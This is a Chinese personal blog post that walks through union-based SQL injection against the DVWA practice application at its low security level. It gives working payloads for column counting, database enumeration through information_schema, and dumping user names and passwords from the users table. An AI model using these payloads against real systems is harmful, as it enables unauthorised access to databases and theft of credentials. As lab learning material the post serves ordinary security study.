您当前的位置: 首页 > 学无止境 > 心得笔记 网站首页心得笔记
SQL注入漏洞的利用
发布时间:2019-08-14 19:41:29编辑:雪饮阅读()
在low级别时sql注入测试脚本如 :
注入第一步order by
mysql中order by不仅仅可以指定字段名来排序,也可以根据字段序号来排序,则我们可以通过不断测试发现其查询的最大字段列数
当我们超出列数时:
当不超出列数时
注意:本步骤是为了得知select的字段列数。注入语句中的单引号是为了关闭原来的单引号,然后进行我们追加构造sql,至于单引号前面的值只要是符合sql查询语法即可,这里就不多加赘述,自己联想吧。
注入第二步union(回显)
从第一步得知字段列数为2后,则这里再注入如:
1’ union select 1,2 #
注意,union select后面的值不一定非得“1,2”也可"5,6","7,8"。。。只要列数对的上即可。
注意:这一步骤是为了验证验证字段列数及union结果集合并的可用性
注入第三步(查看当前所用mysql用户身份及其所在数据库名)
类同第二步,则如下注入可以获取得到当前所用mysql用户身份及其所在数据库名
1’ union select user(),database()#
注入第四步(查看当前所在库有哪些表)
1' union select table_name,2 from information_schema.tables where table_schema='dvwa'#
注入第五步(查看某个表有哪些字段)
1' union select column_name,2 from information_schema.columns where table_name='users'#
注入第六步(分析表中重要字段)
1' union select user,password from users#
关键字词:sql注入
上一篇:dvwa环境搭建及简单使用
下一篇:medium级别SQL注入分析
相关文章
-
无相关信息